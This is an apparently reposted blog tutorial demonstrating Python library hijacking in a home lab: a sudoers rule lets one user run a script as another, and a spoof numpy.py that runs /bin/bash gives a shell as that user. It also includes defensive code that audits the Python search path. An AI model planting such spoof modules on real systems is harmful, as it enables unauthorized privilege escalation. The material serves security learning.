[Tut] Python Library Hijacking – A Simple Demonstration on NumPy - Sick Gaming (https://www.sickgaming.net), Forum: Python (https://www.sickgaming.net/forum-83.html), Thread: /thread-100269.html
[Tut] Python Library Hijacking – A Simple Demonstration on NumPy - xSicKxBot - 11-22-2022 <div> <p>In this blog post, I’ll show you how I recreated a <strong>Python library hijacking vulnerability</strong> on my home network. </p> <div class="wp-block-image"> <figure class="aligncenter size-full"><img loading="lazy" decoding="async" width="1021" height="571" src="https://blog.finxter.com/wp-content/uploads/2022/11/image-224.png" alt="" class="wp-image-908642" srcset="https://blog.finxter.com/wp-content/uploads/2022/11/image-224.png 1021w, https://blog.finxter.com/wp-content/uploads/2022/11/image-224-300x168.png 300w, https://blog.finxter.com/wp-content/uploads/2022/11/image-224-768x430.png 768w" sizes="(max-width: 1021px) 100vw, 1021px" /></figure> </div> <p>The <a href="https://tryhackme.com/room/wonderland" data-type="URL" data-id="https://tryhackme.com/room/wonderland" target="_blank" rel="noreferrer noopener">Wonderland box on TryHackMe</a> was the inspiration for exploring this kind of vulnerability.</p> <p>In my previous <a href="https://blog.finxter.com/tryhackme-walkthrough-wonderland/" data-type="post" data-id="892288" target="_blank" rel="noreferrer noopener">Wonderland walkthrough blog post</a>, I highlighted an example of exploiting the ‘<code><a href="https://blog.finxter.com/python-random-module/" data-type="post" data-id="5030" target="_blank" rel="noreferrer noopener">random</a></code>’ module to switch users without knowing their password. </p> <p>In this post, I’ll guide you through the setup and execution of the exploit. 
You can also watch the accompanying video tutorial here:</p> <figure class="wp-block-embed-youtube wp-block-embed is-type-video is-provider-youtube"><a href="https://blog.finxter.com/python-library-hijacking-demonstration/"><img src="https://blog.finxter.com/wp-content/plugins/wp-youtube-lyte/lyteCache.php?origThumbUrl=https%3A%2F%2Fi.ytimg.com%2Fvi%2FvXkGYLfQauk%2Fhqdefault.jpg" alt="YouTube Video"></a><figcaption></figcaption></figure> <h2>What is Python Library Hijacking?</h2> <div class="wp-block-image"> <figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="607" height="911" src="https://blog.finxter.com/wp-content/uploads/2022/11/image-225.png" alt="" class="wp-image-908661" srcset="https://blog.finxter.com/wp-content/uploads/2022/11/image-225.png 607w, https://blog.finxter.com/wp-content/uploads/2022/11/image-225-200x300.png 200w" sizes="(max-width: 607px) 100vw, 607px" /></figure> </div> <p>When a user is allowed to run a file as another user, it is possible to plant a <strong>spoof file</strong> that Python will import instead of the module or library the script intended, because the import system takes the first match it finds on its search path. The necessary conditions for Python library hijacking are:</p> <ol> <li>The user must have sudo permission to run a Python file (<code>.py</code>) as another user.</li> <li>The Python module search path must look first in the folder where the spoof file is stored.</li> </ol> <h2>Setup</h2> <div class="wp-block-image"> <figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="608" height="912" src="https://blog.finxter.com/wp-content/uploads/2022/11/image-226.png" alt="" class="wp-image-908664" srcset="https://blog.finxter.com/wp-content/uploads/2022/11/image-226.png 608w, https://blog.finxter.com/wp-content/uploads/2022/11/image-226-200x300.png 200w" sizes="(max-width: 608px) 100vw, 608px" /></figure> </div> <p>In order to re-create this vulnerability, I had to learn how to set up the above conditions for the exploit. 
</p> <p>On my home network, I have a <a rel="noreferrer noopener" href="https://blog.finxter.com/getting-to-know-your-basic-uctronics-raspberry-pi-pico-kit/" data-type="post" data-id="892909" target="_blank">Raspberry Pi</a> 3b running the DietPi operating system. Originally I set this up to run Pi-hole to filter ads out of my home network. </p> <p>In order to set up the permissions to run a file as another user, I edited the sudoers file with <code>visudo</code>. </p> <p><a rel="noreferrer noopener" href="https://www.sudo.ws/docs/man/1.8.13/visudo.man/" data-type="URL" data-id="https://www.sudo.ws/docs/man/1.8.13/visudo.man/" target="_blank">Visudo</a> is a special editor specifically for editing the sudoers file. It only allows one user to edit the file at a time, and it also checks user edits for correct syntax. I created a file called ‘<code>checkmypermissions.py</code>’ and granted sudo permission to <code>vulnerableuser</code> to run it as the user ben. </p> <div class="wp-block-image"> <figure class="aligncenter size-large"><img decoding="async" loading="lazy" width="1024" height="238" src="https://blog.finxter.com/wp-content/uploads/2022/11/image-219-1024x238.png" alt="" class="wp-image-908611" srcset="https://blog.finxter.com/wp-content/uploads/2022/11/image-219-1024x238.png 1024w, https://blog.finxter.com/wp-content/uploads/2022/11/image-219-300x70.png 300w, https://blog.finxter.com/wp-content/uploads/2022/11/image-219-768x178.png 768w, https://blog.finxter.com/wp-content/uploads/2022/11/image-219.png 1249w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure> </div> <p>To do this I used the command ‘<code>sudo visudo</code>’ to edit the sudoers file, and then I added the second line for <code>vulnerableuser</code>:</p> <pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="3" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group=""># User privilege specification
root	ALL=(ALL:ALL) ALL
vulnerableuser ALL=(ben:1001) /usr/bin/python3 /home/vulnerableuser/checkmypermissions.py</pre> <p>The nice thing about <code>visudo</code> is that it checks your formatting to make sure that there are not any errors, and it will even suggest changes to help you format the permissions correctly. </p> <p>This functionality saved me time getting the correct spacing and punctuation on the new sudoers line.</p> <h2>Running the Exploit</h2> <div class="wp-block-image"> <figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="608" height="912" src="https://blog.finxter.com/wp-content/uploads/2022/11/image-227.png" alt="" class="wp-image-908667" srcset="https://blog.finxter.com/wp-content/uploads/2022/11/image-227.png 608w, https://blog.finxter.com/wp-content/uploads/2022/11/image-227-200x300.png 200w" sizes="(max-width: 608px) 100vw, 608px" /></figure> </div> <p>Once the permissions were set up, I ssh’d into <code>vulnerableuser@&lt;raspberry pi IP&gt;</code>. Running the ‘<code>sudo -l</code>’ command showed me the granular sudo permissions.</p> <div class="wp-block-image"> <figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="809" height="266" src="https://blog.finxter.com/wp-content/uploads/2022/11/image-220.png" alt="" class="wp-image-908621" srcset="https://blog.finxter.com/wp-content/uploads/2022/11/image-220.png 809w, https://blog.finxter.com/wp-content/uploads/2022/11/image-220-300x99.png 300w, https://blog.finxter.com/wp-content/uploads/2022/11/image-220-768x253.png 768w" sizes="(max-width: 809px) 100vw, 809px" /></figure> </div> <p>The line above, <code>(ben : 1001) /usr/bin/python3 /home/vulnerableuser/checkmypermissions.py</code>, shows that as <code>vulnerableuser</code> I can execute the <code>checkmypermissions.py</code> file <em>as the user ben</em>. 
</p> <p>All that is left to do is to check the Python module search path (<code>sys.path</code>, not the shell’s <code>PATH</code>) to make sure that it looks in the current directory first, and then create a Python file named <code>numpy.py</code> with code to spawn a shell. One way to check the Python search path is:</p> <p><strong>Python</strong></p> <pre class="EnlighterJSRAW" data-enlighter-language="python" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">import sys
sys.path</pre> <p>In the example below, we can see that the Python search path is already set to search in the current working directory (<code>''</code>). Note that when a script is run from a file rather than in the interactive interpreter, the first entry is instead the directory containing the script, here <code>/home/vulnerableuser</code>, so a spoof module placed next to the script is found before the installed one. </p> <div class="wp-block-image"> <figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="558" height="275" src="https://blog.finxter.com/wp-content/uploads/2022/11/image-221.png" alt="" class="wp-image-908628" srcset="https://blog.finxter.com/wp-content/uploads/2022/11/image-221.png 558w, https://blog.finxter.com/wp-content/uploads/2022/11/image-221-300x148.png 300w" sizes="(max-width: 558px) 100vw, 558px" /></figure> </div> <p>Next we create the <code>numpy.py</code> file to spawn a <a href="https://blog.finxter.com/how-to-execute-python-shell-commands/" data-type="post" data-id="887777" target="_blank" rel="noreferrer noopener">shell</a>.</p> <p><code><strong>nano numpy.py</strong></code></p> <pre class="EnlighterJSRAW" data-enlighter-language="python" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">import os
os.system("/bin/bash")</pre> <p>It is important to first set up execute permissions on the spoofed <code>numpy.py</code> file:</p> <pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">chmod +x numpy.py</pre> 
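<p>To audit the two conditions above from the defender’s side, here is an added example (my own code, not from the post) that mimics Python’s path-based import search: it reports which search-path entry would win for a module name, every entry that holds a same-named copy, and which entries the current user can write to. The temp-directory layout it builds (a spoof <code>numpy.py</code> ahead of a stand-in package) is constructed for the demo, and the function names are mine.</p>

```python
import os
import sys
import tempfile

def _module_files(entry, module_name):
    """Files that would satisfy 'import module_name' from one search-path
    entry. '' stands for the current working directory, as in sys.path."""
    base = entry if entry else os.getcwd()
    return [os.path.join(base, module_name + ".py"),
            os.path.join(base, module_name, "__init__.py")]

def resolve_module(module_name, search_path):
    """Mimic the path-based import search: the first entry that holds
    module_name.py or module_name/__init__.py wins. Returns (entry, file)."""
    for entry in search_path:
        for candidate in _module_files(entry, module_name):
            if os.path.isfile(candidate):
                return entry, candidate
    return None

def shadowing_entries(module_name, search_path):
    """Every entry holding a copy of module_name, in search order; more than
    one hit means the first entry shadows the rest."""
    return [e for e in search_path
            if any(os.path.isfile(c) for c in _module_files(e, module_name))]

def writable_entries(search_path):
    """Entries the current user can write to; '' (cwd) always counts. A
    writable entry ahead of site-packages is where a spoof could be planted."""
    return [e for e in search_path if e == "" or os.access(e, os.W_OK)]

def demo():
    """Constructed layout: a spoof numpy.py in one temp dir and a stand-in
    numpy/__init__.py package in another, mirroring the post's setup."""
    spoof_dir, real_dir = tempfile.mkdtemp(), tempfile.mkdtemp()
    with open(os.path.join(spoof_dir, "numpy.py"), "w") as f:
        f.write("# constructed spoof module\n")
    os.mkdir(os.path.join(real_dir, "numpy"))
    with open(os.path.join(real_dir, "numpy", "__init__.py"), "w") as f:
        f.write("# constructed stand-in for the installed package\n")
    hijacked = resolve_module("numpy", [spoof_dir, real_dir])
    clean = resolve_module("numpy", [real_dir])
    return spoof_dir, real_dir, hijacked, clean

if __name__ == "__main__":
    _, _, hijacked, clean = demo()
    print("spoof dir first:", hijacked[1], "| without it:", clean[1])
    print("writable sys.path entries:", writable_entries(sys.path))
```

Running it on the target interpreter with its real <code>sys.path</code> shows whether any writable entry precedes the directory that holds the genuine package.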
<p>Now we can carry out the Python library hijack and spawn a shell as user ben without knowing their password by running the following command:</p> <pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">sudo -u ben /usr/bin/python3 /home/vulnerableuser/checkmypermissions.py</pre> <h2>Project Learnings</h2> <div class="wp-block-image"> <figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="608" height="912" src="https://blog.finxter.com/wp-content/uploads/2022/11/image-228.png" alt="" class="wp-image-908669" srcset="https://blog.finxter.com/wp-content/uploads/2022/11/image-228.png 608w, https://blog.finxter.com/wp-content/uploads/2022/11/image-228-200x300.png 200w" sizes="(max-width: 608px) 100vw, 608px" /></figure> </div> <h3>Learning #1</h3> <p>I learned that <strong>visudo is a special editor within Linux</strong> for changing the sudoers file <code>/etc/sudoers</code>. </p> <p>It checks formatting to avoid errors or lockouts caused by poorly written lines. The sudoers file lets the root user grant other users fine-grained permissions on Linux.</p> <h3>Learning #2</h3> <p>Granting a user permission to run a file as another user can expose a machine to library hijacking vulnerabilities. </p> <p>Running <code>sudo -l</code> reveals such per-file sudo permissions when enumerating a host for privilege escalation vectors.</p> <h3>Learning #3</h3> <p>I found that it is helpful to compile a custom shortlist of Python and bash commands new to me for each project. I borrowed this strategy from my experience with language learning. </p> <p>Over the years, I’ve improved my Mandarin by taking notes on new vocabulary words and grammar patterns. When working on a new topic area I would always create my own custom grammar and vocabulary lists for reference. 
</p> <p>I’ve found that the simple act of focusing on recording a list helps to cement my learning and creates a nice reference for later use.</p> </div> https://www.sickgaming.net/blog/2022/11/20/python-library-hijacking-a-simple-demonstration-on-numpy/